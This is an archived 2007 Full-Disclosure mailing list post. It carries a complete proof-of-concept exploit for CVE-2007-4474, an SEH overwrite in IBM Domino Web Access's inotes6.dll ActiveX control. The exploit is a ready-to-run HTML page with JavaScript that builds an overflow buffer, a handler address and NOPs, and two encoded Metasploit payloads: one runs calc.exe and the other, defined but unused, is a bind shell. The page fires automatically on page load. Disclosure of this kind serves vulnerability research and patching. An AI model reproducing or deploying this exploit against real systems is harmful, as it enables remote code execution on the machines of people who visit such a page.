Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security FullDisclosure
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[Full-disclosure] IBM Domino Web Access inotes6.dll SEH Overwrite Exploi

from [elazar] Network Security [Permanent Link]
Subject: [Full-disclosure] IBM Domino Web Access inotes6.dll SEH Overwrite Exploit
Date: Sun, 30 Dec 2007 20:19:24 -0500 
My first attempt at an SEH overwrite exploit. Anyhow, I first 
posted about this issue regarding version 7 of this control, Will 
Dormann of the CERT/CC discovered versions 6 and 6.5 are vulnerable 
too, see http://www.kb.cert.org/vuls/id/963889. Dwa7w.dll and 
inotes6w.dll are unicode, thats my next project. Code is inline and 
attached.

---------------------
<!-- 
written by e.b. 
IBM Domino Web Access Upload Module inotes6.dll SEH Overwrite 
Exploit
Bad chars: 0x80+
CVE-2007-4474
Tested on Windows XP SP2(fully patched) English, IE6, inotes6.dll 
version 6.0.40.0 and version 6.0.48.0
Thanks to str0ke for pointing me in the right direction and to 
h.d.m. and the Metasploit crew 
-->
<html>
 <head>
  <title>IBM Domino Web Access Upload Module inotes6.dll SEH 
Overwrite Exploit</title>
  <script language="JavaScript" defer>
    function Check() {
     
     var buf = 'A'; 
     while (buf.length <= 3119) buf = buf + 'A';


// win32_exec -  EXITFUNC=seh CMD=c:\windows\system32\calc.exe 
Size=378 Encoder=Alpha2 http://metasploit.com 
var shellcode1 = 
unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49" +
                          
"%48%49%49%49%49%49%49%49%49%49%49%49%51%5a%6a%43" +
                          
"%58%30%42%31%50%42%41%6b%42%41%53%42%32%42%41%32" +
                          
"%41%41%30%41%41%58%50%38%42%42%75%48%69%6b%4c%4d" +
                          
"%38%63%74%75%50%33%30%67%70%4c%4b%73%75%57%4c%6e" +
                          
"%6b%63%4c%45%55%63%48%33%31%58%6f%6c%4b%70%4f%77" +
                          
"%68%6e%6b%73%6f%71%30%65%51%6a%4b%72%69%4e%6b%36" +
                          
"%54%4e%6b%45%51%4a%4e%46%51%6b%70%4f%69%4c%6c%6e" +
                          
"%64%59%50%73%44%53%37%58%41%7a%6a%54%4d%33%31%78" +
                          
"%42%48%6b%7a%54%77%4b%52%74%66%44%34%44%62%55%59" +
                          
"%75%6e%6b%41%4f%36%44%45%51%6a%4b%53%56%4c%4b%46" +
                          
"%6c%72%6b%4c%4b%53%6f%37%6c%63%31%6a%4b%4e%6b%75" +
                          
"%4c%6c%4b%54%41%48%6b%4d%59%51%4c%51%34%34%44%4a" +
                          
"%63%30%31%6f%30%62%44%4e%6b%71%50%54%70%4b%35%6b" +
                          
"%70%50%78%46%6c%6c%4b%63%70%44%4c%4c%4b%44%30%35" +
                          
"%4c%6e%4d%6c%4b%61%78%55%58%6a%4b%64%49%4e%6b%6b" +
                          
"%30%6c%70%57%70%57%70%47%70%4c%4b%70%68%47%4c%71" +
                          
"%4f%44%71%6b%46%33%50%66%36%4f%79%4c%38%6e%63%4f" +
                          
"%30%71%6b%30%50%41%78%58%70%6c%4a%53%34%51%4f%33" +
                          
"%58%4e%78%39%6e%6d%5a%46%6e%61%47%4b%4f%69%77%63" +
                          
"%53%45%6a%33%6c%72%57%30%69%50%6e%62%44%70%6f%73" +
                          
"%47%41%63%41%4c%50%73%42%59%31%63%50%74%65%35%70" +
                          
"%6d%54%73%65%62%33%6c%30%63%41%71%70%6c%53%53%66" +
                          "%4e%31%75%74%38%70%65%77%70%43");

// win32_bind -  EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 
http://metasploit.com 
var shellcode2 = 
unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49" +
                          
"%49%49%49%49%49%49%49%49%49%49%37%49%51%5a%6a%43" +
                          
"%58%30%42%31%50%41%42%6b%41%41%53%41%32%41%41%32" +
                          
"%42%41%30%42%41%58%50%38%41%42%75%78%69%4b%4c%72" +
                          
"%4a%58%6b%52%6d%4a%48%4a%59%6b%4f%6b%4f%69%6f%41" +
                          
"%70%4e%6b%52%4c%74%64%41%34%6e%6b%37%35%55%6c%4c" +
                          
"%4b%71%6c%64%45%61%68%74%41%6a%4f%6e%6b%62%6f%32" +
                          
"%38%6c%4b%33%6f%37%50%55%51%78%6b%31%59%6c%4b%50" +
                          
"%34%6e%6b%46%61%68%6e%45%61%6f%30%6c%59%6c%6c%6b" +
                          
"%34%39%50%41%64%37%77%68%41%69%5a%56%6d%63%31%4b" +
                          
"%72%78%6b%6c%34%75%6b%56%34%31%34%57%58%54%35%6b" +
                          
"%55%6e%6b%33%6f%55%74%74%41%78%6b%41%76%4c%4b%46" +
                          
"%6c%62%6b%6e%6b%41%4f%35%4c%56%61%68%6b%66%63%36" +
                          
"%4c%6c%4b%6b%39%72%4c%44%64%57%6c%61%71%4f%33%47" +
                          
"%41%6b%6b%33%54%4c%4b%63%73%70%30%6c%4b%53%70%64" +
                          
"%4c%6c%4b%72%50%45%4c%4e%4d%6c%4b%37%30%75%58%73" +
                          
"%6e%42%48%4c%4e%52%6e%46%6e%58%6c%56%30%39%6f%58" +
                          
"%56%71%76%46%33%72%46%63%58%30%33%70%32%33%58%54" +
                          
"%37%52%53%45%62%51%4f%50%54%4b%4f%5a%70%33%58%6a" +
                          
"%6b%68%6d%59%6c%45%6b%46%30%49%6f%59%46%73%6f%4e" +
                          
"%69%58%65%73%56%4d%51%58%6d%36%68%64%42%72%75%72" +
                          
"%4a%67%72%59%6f%6e%30%72%48%4a%79%56%69%6b%45%6e" +
                          
"%4d%76%37%6b%4f%58%56%33%63%30%53%50%53%76%33%70" +
                          
"%53%33%73%53%63%37%33%56%33%6b%4f%5a%70%32%46%50" +
                          
"%68%35%41%71%4c%30%66%33%63%6c%49%6d%31%6a%35%70" +
                          
"%68%6e%44%35%4a%52%50%4b%77%71%47%4b%4f%4e%36%30" +
                          
"%6a%52%30%31%41%70%55%59%6f%6e%30%30%68%6c%64%4c" +
                          
"%6d%54%6e%79%79%31%47%59%6f%59%46%46%33%66%35%6b" +
                          
"%4f%58%50%63%58%4b%55%73%79%4c%46%41%59%63%67%4b" +
                          
"%4f%78%56%76%30%53%64%41%44%33%65%79%6f%4e%30%4e" +
                          
"%73%71%78%58%67%61%69%69%56%71%69%62%77%39%6f%6a" +
                          
"%76%51%45%49%6f%4e%30%51%76%53%5a%71%74%72%46%62" +
                          
"%48%30%63%30%6d%6c%49%5a%45%63%5a%62%70%76%39%31" +
                          
"%39%58%4c%4e%69%4d%37%53%5a%33%74%4e%69%4b%52%56" +
                          
"%51%4b%70%6c%33%6f%5a%49%6e%33%72%44%6d%6b%4e%37" +
                          
"%32%76%4c%6e%73%6c%4d%70%7a%76%58%6c%6b%4e%4b%4c" +
                          
"%6b%73%58%53%42%79%6e%6d%63%74%56%6b%4f%30%75%70" +
                          
"%44%4b%4f%79%46%53%6b%70%57%70%52%71%41%50%51%42" +
                          
"%71%41%7a%33%31%42%71%41%41%51%45%66%31%69%6f%5a" +
                          
"%70%50%68%6e%4d%5a%79%56%65%68%4e%33%63%39%6f%58" +
                          
"%56%63%5a%4b%4f%4b%4f%70%37%4b%4f%4a%70%4c%4b%61" +
                          
"%47%6b%4c%4d%53%6b%74%31%74%49%6f%59%46%70%52%59" +
                          
"%6f%4e%30%63%58%6c%30%6f%7a%57%74%61%4f%32%73%4b" +
                          "%4f%68%56%39%6f%38%50%43");


                var next_seh_pointer = unescape("%EB%06%90%90"); //2 byte jump
                
                //oleacc.dll Windows XP SP2 English 0x74C96950 pop ebp - pop - 
retbis
                //no SafeSEH
                var seh_handler = unescape("%50%69%C9%74"); 
        
                var nop = unescape("%90%90%90%90%90%90%90%90%90%90%90%90");

                var m = buf + next_seh_pointer + seh_handler + nop + shellcode1 
+ 
nop;
                
                obj.General_ServerName = m;
                obj.InstallBrowserHelperDll();

   } 
   
   </script>
  </head>
 <body onload="JavaScript: return Check();">
    <object id="obj" classid="clsid:3BFFE033-BF43-11D5-A271-
00A024A51325">
     Unable to create object
    </object>
 </body>
</html>

---------------------

Elazar

--
Compare Cell Phone Carriers- Click Now.
http://tagline.hushmail.com/fc/Ioyw6h4fMiW01DlRT5EdxG74bAoErxGvZoOSv1JtIEt847RmpKnqQI/
Unable to create object 
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [Full-disclosure] IBM Domino Web Access inotes6.dll SEH Overwrite Exploit, elazar <=
Previous by Date:  [Full-disclosure] [ GLSA 200712-25 ] OpenOffice.org: User-assisted arbitrary code execution, Pierre-Yves Rofes
Next by Date:  Re: [Full-disclosure] usb shorting to ground, Dave \"No, not that one\" Korn
Previous by Thread:  [Full-disclosure] [ GLSA 200712-25 ] OpenOffice.org: User-assisted arbitrary code execution, Pierre-Yves Rofes
Next by Thread:  [Full-disclosure] Installshield isusweb.dll Buffer Overflow Exploit, elazar
Indexes:  [Date] [Thread] [Top] [All Lists]